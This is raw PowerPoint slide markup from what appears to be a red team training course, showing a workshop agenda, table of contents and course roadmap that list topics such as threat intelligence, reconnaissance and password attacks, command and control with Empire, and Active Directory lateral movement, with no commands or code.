                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Lecture : Hopping Trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Lab 4: Hopping Trusts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8290520-0E57-6482-9117-AAE6459D79BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701389" y="2615147"/>
            <a:ext cx="3037821" cy="1089529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Workshop Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC60F170-BC0D-C678-55EC-3A1D795F7955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3949700" y="926551"/>
            <a:ext cx="0" cy="555625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F680459-EBE5-BBD6-53A3-C9E05FC00C30}"/>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3" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C613F20-E1CC-913C-AD4E-81129648A70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4" name="Straight Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34FD506F-8437-68D1-37CC-951F00E8FB07}"/>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5" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0111DBA7-B211-7F97-BE87-733084B1E79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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1193042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44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CA9F-BCCC-CC41-84DE-C2EF82AB1C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Table of Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5361989-6728-D6FE-6B71-E7ADE39A2910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1">
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="650201644"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="428623" y="1165776"/>
          <a:ext cx="11317763" cy="5191760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10127617">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3429776840"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1190146">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2667141475"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Course Agenda</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3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="829386456"/>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Common Language</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5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1205794284"/>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Why Red Team?</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20</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1682828468"/>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1.1: Environment Orientation</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34</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2686607350"/>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Frameworks and Methodologies</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35</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2439768193"/>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Threat Intelligence</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57</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4550520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Lab 1.2: Consuming Threat Intelligence</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83</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="113844516"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Planning</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84</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="16028096"/>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1.3: Red Team Planning</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112</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2049400461"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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Red Team Execution</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113</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3225923180"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="37084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500" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lab 1.4: Reconnaissance and Password Attacks</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="182880" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="0" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>159</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2080832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Intro to Command and Control (C2)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="182880" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="0" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>160</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="13356429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n-lt"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lab 1.5: C2 Introduction with Empire</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="182880" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="0" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>180</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3383972462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Contacts and Resources</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="182880" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="0" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>181</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="171450" marT="9525" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4045852611"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357574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09A1B8-1CE6-6563-3A5E-F5F50BD65967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5434487" y="614689"/>
            <a:ext cx="6190065" cy="6039030"/>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Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7035A700-FA1F-8A45-9B83-CC7FE22763D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992442" y="800100"/>
            <a:ext cx="0" cy="5853619"/>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7A520-A86F-A4BB-AD65-A0B7B61AF567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428622" y="614689"/>
            <a:ext cx="4036505" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005880"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFD57923-D730-4740-DADF-12EE08C178C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428622" y="1309387"/>
            <a:ext cx="4295777" cy="5493812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005880"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Section 1: Planning Adversary Emulation and Threat Intelligence</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b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Section 2: Attack Infrastructure and Operational Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1950" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0455A5"/>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3: Getting In and Staying In</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4: Active Directory Attacks and Lateral Movement</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5: Action on Objectives and Reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Section 6: Immersive Red Team Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5D8BB1B-8082-16C1-50DE-7158D9783931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5524381" y="743307"/>
            <a:ext cx="6010275" cy="4149854"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why Red Team?</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1.1: Environment Orientation</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Frameworks and Methodologies</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Threat Intelligence</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1.2: Consuming Threat Intelligence</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Planning</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1.3: Red Team Planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="ctr" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Red Team Execution</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3"/>
                    </a:ext>
                  </a:extLst>
                </a:blip>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Lab 1.4: Reconnaissance and Password Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="ctr" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Intro to Command and Control (C2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="ctr" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
